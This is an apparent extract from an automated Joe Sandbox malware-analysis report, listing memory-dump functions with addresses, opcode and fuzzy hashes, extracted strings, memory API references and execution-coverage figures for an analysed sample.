Instruction ID: 68512273498fd0e6472cb16a5a99d0c5f153eb145ed2acf5845017a79f155abc
Opcode Fuzzy Hash: 2beb56fcdfae7de04f9c0b719414eb87a91d442f2512e6ea8deffa91b69a2f8d
Instruction Fuzzy Hash: 3601A430A2864DCFDB84EF58C885AA97BE0FB58314F154565E85DD3254D730E960CB81

Function 00007FFD9BAB06A5 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 100a4df91e84942ad351d9653140638ecab949c848c09544ca698cb1f753fbbe
Instruction ID: c2cddb36c453699d795c51c7ac93a3622abff7a6efde449f50b77d963f459537
Opcode Fuzzy Hash: 100a4df91e84942ad351d9653140638ecab949c848c09544ca698cb1f753fbbe
Instruction Fuzzy Hash: A8F03030A0561E9FEB60EF99D4596FE77A0FF54300F110436E41CC21A0DA74A690CB84

Function 00007FFD9BAB1300 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cde9f0e7d32f3c50f3b426655184bebd6554bb8e04d382b4fd8626c46bbd37f2
Instruction ID: ecaf3db6e92d3b6517a548b9362baf0238879299a42c35afbcfd4a87a84482b2
Opcode Fuzzy Hash: cde9f0e7d32f3c50f3b426655184bebd6554bb8e04d382b4fd8626c46bbd37f2
Instruction Fuzzy Hash: 92F0BD74A1494DDFDF94EF58C449AAA7BE0FF68304F014466F818C3260D630E594CB80

Function 00007FFD9BAB06C8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9547e6e923fac0699592f2518b4ea5e80e26951fbd0eed22d200345d2e97913e
Instruction ID: fc1514eaa603810483ea6bbc1a113ef380b1a0f8404c506795c8e4e6b868ae42
Opcode Fuzzy Hash: 9547e6e923fac0699592f2518b4ea5e80e26951fbd0eed22d200345d2e97913e
Instruction Fuzzy Hash: 76F0FE3091564D9FDB90EFA484596FA77E0FF14304F014466A81DD21A0DA74A6A0CB80

Function 00007FFD9BAB1685 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5c2cc354d45b67f99989ab3ea66726f674e37a83f90da756077893ef59647af
Instruction ID: 44102c0401881d6b0d13b881ba813cc6af45c3e014e809bcd6dddd21098756c4
Opcode Fuzzy Hash: f5c2cc354d45b67f99989ab3ea66726f674e37a83f90da756077893ef59647af
Instruction Fuzzy Hash: F5F01535A1964D9BDB20FFA8D9116EAB7A0EF41300F00457AE468C3191EA74A7288B81

Function 00007FFD9BAB0CCF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be682ead2c3556e860b99b0de525dc37a178fc89d4b14a849a0726a23a874278
Instruction ID: d6b8054f09ed72753cbca65ed390a333df328fff63a8cf0905315abae5f883d3
Opcode Fuzzy Hash: be682ead2c3556e860b99b0de525dc37a178fc89d4b14a849a0726a23a874278
Instruction Fuzzy Hash: 62F06870A0955A8BE764DB94C4546FD73B0BF55710F04067AD029932D2CBB46640CF45

Function 00007FFD9BAB70E6 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
Instruction ID: aaf101be2f3ed2dd57927cd51885274b4410d7b4edf407fd4cad41683a17da01
Opcode Fuzzy Hash: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
Instruction Fuzzy Hash: EDF0D470A0A52A8AFB749B94C8543ADB7B0EF95300F2050BDD15EA33D2DE785B85CF49

Function 00007FFD9BAB6B59 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d233c2f3f6fb465e9d50ff9c141fc7841f35677ab884acf20d16951afb082f
Instruction ID: 3ca6a49a6cc8dc7041a6d28810d41fac7b5b5f93952adc2b347d784a004fbbb3
Opcode Fuzzy Hash: 77d233c2f3f6fb465e9d50ff9c141fc7841f35677ab884acf20d16951afb082f
Instruction Fuzzy Hash: D3E08C31E2866C89EBA8DB20C854AECB3B1EF64300F4045FB800EB2094DEB41A808F00

Non-executed Functions

Function 00007FFD9BAB085C Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8535c045ca7ddd105016b8072d75f966048f3d21b4c75bd4ecb184dfcaa88e67
Instruction ID: 9ee4544a855df4daebf5d42f47b777afb6dcb36bba49383b4d3ca5ff700c28c9
Opcode Fuzzy Hash: 8535c045ca7ddd105016b8072d75f966048f3d21b4c75bd4ecb184dfcaa88e67
Instruction Fuzzy Hash: 2B716370A08A4D8FEBA8EF58C855BF977E1FF69310F10412AE84DC7291DB749985CB81

Function 00007FFD9BAB09B0 Relevance: 5.2, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FFD9BAB0B4E
"s9, xrefs: 00007FFD9BAB0B46
c9, xrefs: 00007FFD9BAB0B56
#{9, xrefs: 00007FFD9BAB0B3E

Memory Dump Source

Source File: 00000000.00000002.1682739086.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bab0000_OH6KO8NBy1.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: bd7d849093680327cbde912dee0b0aa862b9edba8ff449d95fa61d7c45cc43c2
Instruction ID: 7d178ec8f5d423defeff0d21c16cc78616b767b7e79ff915253d8d5543a29955
Opcode Fuzzy Hash: bd7d849093680327cbde912dee0b0aa862b9edba8ff449d95fa61d7c45cc43c2
Instruction Fuzzy Hash: 33419D17B0953645E339B3FD78219E9AB848FA827FB0847BBF56E8D0C74C486081C2D9

Analysis Process: EGjcLJxUTLCptztefbFicvsgXASnZ.exePID: 7676, Parent PID: 7544COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BACBD2D Relevance: 1.8, Instructions: 1809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bacb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bacc46f90d32c476f27a33ec38aab333ba4b0b7659122aced47f7cea1be6b4e8
Instruction ID: 442e6c5025b1aad074d56d0cc966cf3565ee8c3346ac4a0d306f62b1c8ab9a8f
Opcode Fuzzy Hash: bacc46f90d32c476f27a33ec38aab333ba4b0b7659122aced47f7cea1be6b4e8
Instruction Fuzzy Hash: 08F21C70E19A5D8FDBA8EB58C8A5BB8B7B1FB58310F0441F9D00DD7292DA746A81CF41

Function 00007FFD9BAFA4C7 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b58964d2715abd962d4a13b661b89eeeb9f6a1f70753be7918b37de06354bd34
Instruction ID: e43d10b27c9316c90ad6781c96eb1cebfaffd7625d9a1bb39913e1656c787e42
Opcode Fuzzy Hash: b58964d2715abd962d4a13b661b89eeeb9f6a1f70753be7918b37de06354bd34
Instruction Fuzzy Hash: 4A020770E0421D8FDB58DFA8C4A19ECFBB1FF48304F148669D41AAB25ADB34A985CF54

Function 00007FFD9BAB0D70 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d69342d48bf886699ad8b6e8cd056763c86def9d1027f376ddf1db78c6b4d31
Instruction ID: b2dfd440d3df680a83f4b6b1e37e3d31fa72e8c36d3f279817f8f1266ce1d883
Opcode Fuzzy Hash: 2d69342d48bf886699ad8b6e8cd056763c86def9d1027f376ddf1db78c6b4d31
Instruction Fuzzy Hash: E0A1C171A19A9D8FE798DB68C8657AEBFE1EF59310F0402BED019D72D6CB781811CB40

Function 00007FFD9BB031B5 Relevance: 2.6, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 00007FFD9BB0921C
,, xrefs: 00007FFD9BB08BE2

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: ,$4
API String ID: 0-508195717
Opcode ID: e5a20bcc341ac766fd2ff3c1164927bdbcfb286613846a4ba7639411c792dcac
Instruction ID: 28b3df58b117c5fe0a9668d753d57b0aaffdf8c488345b74fb81c4cb59b316c0
Opcode Fuzzy Hash: e5a20bcc341ac766fd2ff3c1164927bdbcfb286613846a4ba7639411c792dcac
Instruction Fuzzy Hash: A2413D70A0A54DCFDB68DF94C8A4AB9B7B1FF58314F1541AAC04AD72E5DB35AA81CF00

Function 00007FFD9BB03EC0 Relevance: 1.7, Strings: 1, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB081EA

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 602cd4f3409d292e5e1efe7c6e576f1a5a373575d72e2fd908dbd8fbcbbdf157
Instruction ID: 50939e7981d8f9091fd8fdcac2c931b38e783c94c0b486f544927d346c80d9c4
Opcode Fuzzy Hash: 602cd4f3409d292e5e1efe7c6e576f1a5a373575d72e2fd908dbd8fbcbbdf157
Instruction Fuzzy Hash: B9D11A32B1AD4E4FDBA8DB5C98A4AB577D1FFA8314B0501BAD44DC72EADE24ED418340

Function 00007FFD9BAC215E Relevance: 1.7, APIs: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFD9BAC229A

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
Instruction ID: 8c2e05ee72fe3965e5269d14b0a09a495a0201150d3fcebb8ffedbbbfcc4bcaf
Opcode Fuzzy Hash: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
Instruction Fuzzy Hash: D4516D30D0874D8FDB54DFA8C845AEDBBF1FB6A310F1042AAD049E7255DB74A885CB81

Function 00007FFD9BB0E3E0 Relevance: 1.6, Strings: 1, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`H_^, xrefs: 00007FFD9BB0E401

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: `H_^
API String ID: 0-3575367951
Opcode ID: 5498e4535e6c1673d5574cc4d8c521a78f55db81863bfad7192a79eb8b28fab6
Instruction ID: 9e66a677ca963472cab014d3f00e79d1956b33775b4393742ac1c9ab42af62ed
Opcode Fuzzy Hash: 5498e4535e6c1673d5574cc4d8c521a78f55db81863bfad7192a79eb8b28fab6
Instruction Fuzzy Hash: EEA11532F0EA494FEB68EA9C94655BC77A1FF95314B4401BFD088CB1EBED25AD418780

Function 00007FFD9BAC3B4D Relevance: 1.5, APIs: 1, Instructions: 209
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 00007FFD9BAC3C6F

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
Instruction ID: 41277c795239166d6de7c874eab3a7e7acb837bd9bf8348737cbedbe6da44ab4
Opcode Fuzzy Hash: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
Instruction Fuzzy Hash: 99515D7090965C8FDF94EFA8D845BE9BBF1FB69310F0041AAD04DE3252DB74A9858B40

Function 00007FFD9BB0DD61 Relevance: 1.4, Strings: 1, Instructions: 190
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB0DE9A

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 1d0369f57ce07938ea3179aa8039e11e48f78c3a6a55b2a75b8e63b6f031c233
Instruction ID: c0f413b4131cd20d5fa6aebacb022841f0d5e993a2974be1526aa6b47879c83d
Opcode Fuzzy Hash: 1d0369f57ce07938ea3179aa8039e11e48f78c3a6a55b2a75b8e63b6f031c233
Instruction Fuzzy Hash: 38515A31B1DA8E4FEF99DB6884655B977E0FF54358B0006FAE45CCB1EBDE24A9018340

Function 00007FFD9BB0E7B8 Relevance: 1.3, Strings: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

V, xrefs: 00007FFD9BB0E7EA

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: 20386ba46a0ab3ba1f9b60c7fb4f28785714ad22beff32ba2daa9d7f83f5a235
Instruction ID: 04889ae8c7d622f992963f981779ea17378bae3125e3ae18a493585cec431baf
Opcode Fuzzy Hash: 20386ba46a0ab3ba1f9b60c7fb4f28785714ad22beff32ba2daa9d7f83f5a235
Instruction Fuzzy Hash: 1F213720F1DA8A4FE799D728846066277E1FF95304B1541EAD09CCB1FBDE28E843C381

Function 00007FFD9BB0DCBD Relevance: 1.3, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A, xrefs: 00007FFD9BB0DCCA

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
Instruction ID: 2d84c5bc1b79f4c8cf9387dcf4839af0fab892cb1a736461c2943114052cb3a2
Opcode Fuzzy Hash: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
Instruction Fuzzy Hash: D811D621B1DE1D0BDFA8995C546927A77C1FB9832570102BAE84DD32E9DD19AC014380

Function 00007FFD9BB0C746 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

W, xrefs: 00007FFD9BB0C78A

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: dc9546ced19b5a6d239614e2d93cd90ed98ce522708765b24ce778792bbadec3
Instruction ID: 72c41339f1ca5962bdc52df3006f1c3ce0283bc0097bcc3ab8c151859c991c0c
Opcode Fuzzy Hash: dc9546ced19b5a6d239614e2d93cd90ed98ce522708765b24ce778792bbadec3
Instruction Fuzzy Hash: E121057160EBC95FD7598668D4202767BA0FF89254F4901FFE0C8CB2FBCB6999048342

Function 00007FFD9BB06219 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB0622A

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: cb905fec69b707c11668a537e78205c64f76f3cd87561ae066abae70445371f2
Instruction ID: ec30bc578e43b78afa15ff034ad899b1d84318696788513aec17f9b7ad31dfe5
Opcode Fuzzy Hash: cb905fec69b707c11668a537e78205c64f76f3cd87561ae066abae70445371f2
Instruction Fuzzy Hash: 32111B30918A4D8FCF85EF68C859AE97BF0FF28305F0145AAE859D72A1DB35A554CB80

Function 00007FFD9BB06139 Relevance: 1.3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB0614A

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: ce0e006e2e5a35e3ee127fdaec9ce5369bcdb67f36de3f5b6bc645b784300e9c
Instruction ID: cb3c79f513014a11bbf3273eab30b52dca90e989e80685e453905a562d1a8d34
Opcode Fuzzy Hash: ce0e006e2e5a35e3ee127fdaec9ce5369bcdb67f36de3f5b6bc645b784300e9c
Instruction Fuzzy Hash: 70115B30918A8D8FCF85EF68C859AE97BF0FF28304F0141AAE459D72A1DB34E554CB80

Function 00007FFD9BAB4DE8 Relevance: 1.3, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{, xrefs: 00007FFD9BAB4E35

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: {
API String ID: 0-366298937
Opcode ID: 79cb8825cc9aba202ce98f5c9bb709031ae8e39f86886fbecc62ba4f12f01079
Instruction ID: 192301ac3902dc22317791c6dbcedbe4de32a93f14f64094a0dbc4327e24de12
Opcode Fuzzy Hash: 79cb8825cc9aba202ce98f5c9bb709031ae8e39f86886fbecc62ba4f12f01079
Instruction Fuzzy Hash: E7112870E0596D8FEB74DB18CC546E9B7B1EB94312F1082EAD41DE22A5DE782E818F44

Function 00007FFD9BB06CE9 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB06CFA

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0be021e740fc129720b8f2becf9e5df98a336367faf996df1c0805942c4735d8
Instruction ID: 9cf3427986f1fd3ba98fa97df2bc6cb1292ba1059c076b9117cf215d50f90b08
Opcode Fuzzy Hash: 0be021e740fc129720b8f2becf9e5df98a336367faf996df1c0805942c4735d8
Instruction Fuzzy Hash: 6D012130918A8D8FCF85EF68C858AEA7BF0FF25304F4545AAD419D72A6D734D554CB80

Function 00007FFD9BB04DF9 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

U, xrefs: 00007FFD9BB04E0A

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: f32d4b0e3f54dc6dcf379c818dd30d244cc0076160d13183b4d5d631033b1d23
Instruction ID: 9a345e4d1c1547a241727165fbcb8985f970d7575c2b10897d51f2680a6e73ac
Opcode Fuzzy Hash: f32d4b0e3f54dc6dcf379c818dd30d244cc0076160d13183b4d5d631033b1d23
Instruction Fuzzy Hash: 7BF0AF6091E7899FE765AB6048696F87FB0FF19304F4945FBE448C60E7DA2852448712

Function 00007FFD9BB0C5E0 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923eda996ac93e13049bd47040d3ed946281a4f1ed8dedb6ef245c27bad1b3f6
Instruction ID: b7d59511273ab9707514c50e6b5ef0650fe7726869591ea840587f088db2677e
Opcode Fuzzy Hash: 923eda996ac93e13049bd47040d3ed946281a4f1ed8dedb6ef245c27bad1b3f6
Instruction Fuzzy Hash: 6391E531B1DE0A4FE7A8EA58D451975B3D1FFA8324715027ED08EC76EADE25F8428780

Function 00007FFD9BAEFC79 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bae8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f921b6e9b4fec09bce243f744f84e59e5abf1639b9e85f3dc6044aa36904826e
Instruction ID: 802b35863f67a06dd9897a3b1917d44912a33fee1ab3e4f1d385dafdcabc4f7f
Opcode Fuzzy Hash: f921b6e9b4fec09bce243f744f84e59e5abf1639b9e85f3dc6044aa36904826e
Instruction Fuzzy Hash: 7C910A71E09A1D8FDBA4EF58C8A4BA9B7B1FF58310F4441AAD00DD72A5CA34AD85CF40

Function 00007FFD9BB0E8D9 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57055e0c92bc0a993eefc0276ff716fd00896e0c832877715b4e57305879f357
Instruction ID: 2f6e5a3d24c40e295fa6ddaae9ad72476d72dfb466b82792f252f8bad28d0b46
Opcode Fuzzy Hash: 57055e0c92bc0a993eefc0276ff716fd00896e0c832877715b4e57305879f357
Instruction Fuzzy Hash: 7051BF31B19E0A4FDBA9EA58C450975B3E1FF6831471542BED08EC76EADE24F8428780

Function 00007FFD9BAFBD6D Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd98e46814c5b5b8fed36453770280750bd73d2556bb9bbb6932e34c907c7c2e
Instruction ID: fdc8c921cf2f0e9bd74306a5268cea1c6f148c624110c94b8c03d961a2233f9e
Opcode Fuzzy Hash: cd98e46814c5b5b8fed36453770280750bd73d2556bb9bbb6932e34c907c7c2e
Instruction Fuzzy Hash: 01518F30F0D64D8FEB64DB58C8656E8BFB1EF59310F4541BAD40D932A1DA746A44CB41

Function 00007FFD9BAC9079 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1756464540.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bac7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d74c1f2a4b250dfc8c97c6edb7791bbf264b7246d35b187e7945a3a318bde4
Instruction ID: 41da8376c9f57bf9ccad964f653a8c3e9b7d2ad0ca53639703eeac63fe96854d
Opcode Fuzzy Hash: b4d74c1f2a4b250dfc8c97c6edb7791bbf264b7246d35b187e7945a3a318bde4
